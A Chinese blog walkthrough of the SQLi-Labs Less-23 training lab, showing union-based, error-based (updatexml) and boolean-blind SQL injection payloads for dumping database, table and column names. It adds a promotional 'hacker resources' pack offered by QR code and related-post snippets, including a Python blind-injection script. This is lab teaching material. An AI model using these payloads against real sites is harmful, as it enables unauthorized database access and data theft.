SQLi LABS Less 23 联合注入+报错注入+布尔盲注_sqli第二十三关

于 2024-09-12 00:17:18 发布
阅读量771 收藏 9
点赞数 16
文章标签: less 数据库 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_86951331/article/details/142153699
版权

二、思路分析

过滤了注释,需要使用闭合来代替注释。

id有效时,页面会显示查询到的数据,适合联合注入。

参数中携带引号时,页面会返回数据库的报错信息,适合报错注入。

有效的id和无效的id分别对应不同的页面响应,适合布尔盲注。

三、解题步骤

方式一:联合注入

参考文章:联合注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1’ and '1,页面正常显示

地址栏输入:?id=1’ and '0,页面异常(空)显示

综上所述,可以确定,页面存在单引号字符型注入。

第二步、判断字段数

排序未被执行,原因不明,如果你知道为什么,欢迎在评论区留言。

按照以往的经验,暂定字段数为3。

第三步、判断显示位

地址栏输入:?id=0’ union select 1,2,3 and ’

第四步、脱库

获取当前使用的数据库,地址栏输入:

?id=0' union select 1,
	(database())
,3 and '

执行结果:

其余脱库操作时,将下图圈起来的部分替换成SQL语句即可:

常用的脱库语句:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"

方式二:报错注入

参考文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1’

从页面显示的数据库报错信息,可以判断注入点为单引号字符型。

第二步、判断报错条件

地址栏输入:?id=1’ and updatexml(1,0x7e,3) and ’

页面显示报错函数的内容,确定报错函数可用。

第三步、脱库

获取当前使用的数据库,地址栏输入:

?id=1' and updatexml(1,
	concat(0x7e,
		(database())
	)
,3) and '

执行结果:

其余脱库操作时,将下图圈起来的部分替换为SQL语句即可:

方式三:布尔盲注

参考文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1’ and 1 and '1,页面正常显示。

地址栏输入:?id=1’ and 0 and '1,页面异常(空)显示。

由此可知,注入点为单引号字符型注入。

第二步、判断长度

判断当前使用数据库名的长度,是否大于1,地址栏输入:

?id=1' and length(
	(database())
) >1 and '1

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

2401_86951331
关注
sqli-labs Less-23sqli-labs指南 23)—Advanced injection
m0_54899775的博客
12-23 1324
sqli-labs Less-23sqli-labs指南 23
SQLi LABS Less-7 布尔盲注_sqli靶场第七使用盲注(1)
2301_82056337的博客
05-17 519
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’)) and 0 – a,页面异常(空)显示。id=1’)) and 1 – a,页面正常显示。判断成立,页面正常显示,文末使用Python脚本自动化判断。判断成立,页面正常显示,文末使用Python脚本自动化判断。获取 security 库的所有表。获取 users 表的所有字段。因篇幅有限,仅展示部分资料。
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三SQLi-LABS Less-23SQLi-LABS Less 23SQLiLABS Less23SQLi Less 23
Sqli-labsLess-23
→_→
04-18 809
Less-23 基于错误的,过滤注释的GET型 判断注入类型: ?id=1 ?id=1' ?id=1" 发现第二条语句报错: 翻译: 警告:mysql_fetch_array()期望参数1为资源,布尔值在第38行的C:\ phpStudy \ WWW \ sqli ...
sqli-labs/Less-27
m0_71299382的博客
11-20 455
sqli-labs第二十七
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-LabsSQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
SQL注入之基于布尔的盲注详解
09-10
`http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23`这样的注入尝试用于获取第一个表名的第一...
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 772
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入sqli-labs Less-2(联合注入、整形型注入sqli-labs Less-3(联合注入、字符型注入sqli-labs Less-4(联合注入、字符型注入sqli-labs Less-5(利用extractvalue进行报错注入sqli-labs Less-5(双注入布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqlserver数据库布尔盲注_Sqli labs系列-less-8 基于布尔盲注注入
weixin_34959044的博客
01-16 153
第八,还是上一一样,我们无法得出数据的,不过如果用盲注的手段,我还是可以猜测出数据的。盲注具体是啥意思,我就不说了,玩这个都直达,常见的盲注,一个基于布尔值的盲注,一个是基于时间上的盲注。这里我们用到的是基于布尔的盲注,当然,这章,我们只是利用这一,让大家更深入的理解的什么是基于布尔值的盲注。在我自己的学习中,我是很讨厌看文字的,同时如果看图的话,还能看的进心里,同时也好理解,但是很多人的图...
sqli-labs ————less -27(union、SELECT、绕过滤)
Fly_鹏程万里
05-19 2077
Less-27从提示界面中我们可以看出这一小节对union、select进行了绕过,那么我们下面来看看源代码吧:SQL语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* ...
sqli-labs————less 23(高级注入篇)
Fly_鹏程万里
05-12 2412
前言从这一开始,我们进进入了短暂的高级注入部分,这一部分中将会陆续介绍一些更为巧妙的注入技巧。Less -23查看一下源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html...
sqli-labs/Less-23
m0_71299382的博客
11-19 192
sqli-labs第二十三
sqli-labs(27)
weixin_30901729的博客
05-28 470
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
sqli-labs less23
qq_45106794的博客
10-26 273
#sqli-labs less 23 这一的与第一的区别有两个,一个是注释符# --+被过滤了 所以我们得闭合第二个单引号 另一个区别是不能用order by 来判断字段数了 具体原因请参照 https://www.jianshu.com/p/2602430f8ee4 ’ union select 1,2,3,4 or ‘1’='1 ’ union select 1,version(),3 o...
SQLi-LABS Less-23
m0_64898960的博客
04-25 1935
Less-23题目 回到GET注入了,乍一看还以为回到了梦开始的地方…(估计在这里开始学绕过啥的) 尝试==?id=1’== ,结果报错报错可知这里存在过滤,手游我们就需要慢慢进行测试看看它过滤了什么 这里#被过滤了,–+也被过滤了,尝试%23 用or ‘1’='1进行闭合,成功回显… 接下来继续进行注入,由于我们使用了or ‘1’='1来结尾,所以这里不能使用order by来查询字段。 如果不能用order by来查询字段,还可以用union来查询。 得到字段数继续进行注入… 得到数据库
sqlilabs less-23
TA不懒,但还没有添加简介
07-12 329
sqlilabs less-23
sqlilabs less-27~27a
TA不懒,但还没有添加简介
07-20 344
sqlilabs less-27~27a
Sqli-labsLess-27和Less-27a
→_→
04-26 2279
Less-27 基于错误_GET_过滤UNION/SELECT_单引号_字符型注入 测试注入字符类型: ?id=2'%26%26 '1'='1 (id=2的用户说明不带括号,id=1的用户说明带括号) 由此得出,这是单引号字符型注入。(不带小括号的) 根据提示...
攻克sqli-labs第八布尔盲注
最新发布
01-04
### SQLi-Labs 第八布尔盲注解决方案 在探讨 SQLi-Labs 的第八布尔盲注时,了解其核心在于利用条件查询来逐位推断出数据库的信息。具体来说,在此场景中,攻击者可以发送一系列精心构建的 HTTP 请求给服务器,并基于页面返回的不同响应(通常是两种不同的状态),逐步获取目标数据。 对于布尔型盲注而言,通常会使用 `IF()` 函数配合逻辑表达式来进行测试[^1]。例如: ```sql IF(条件, true部分, false部分); ``` 当尝试确定数据库名长度时,可以通过调整注入语句中的数值参数并观察网页反应变化来完成这一过程。如果当前猜测值小于实际库名长度,则应得到一个特定的结果;反之亦然。这有助于缩小范围直至找到确切大小。 为了提高效率,还可以采用二分查找算法代替线性的逐一试探方法。这种方法能够显著减少所需请求次数,尤其是在处理较长字符串的情况下特别有效。 以下是用于自动化执行上述操作的一个简化版 Python 脚本片段,它展示了如何结合布尔盲注技术与编程手段快速定位数据库名称: ```python import requests def decide(url, payload): response = requests.get(url + "?id=" + payload) return "You are in" not in response.text # 判断依据取决于应用的具体反馈机制 def ruler(length_min, length_max): while length_min <= length_max: mid = (length_min + length_max) // 2 if decide(base_url, f"1' AND IF(LENGTH(database())>{mid},true,false)%23"): length_min = mid + 1 else: length_max = mid - 1 return length_min base_url = 'http://example.com/sqli-labs/Less-8/' db_name_length = ruler(0, 20) print(f"The database name is {db_name_length} characters long.") ``` 这段代码实现了对数据库名字串长度的有效探测。在此基础上进一步扩展功能即可实现完整的数据库信息提取流程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值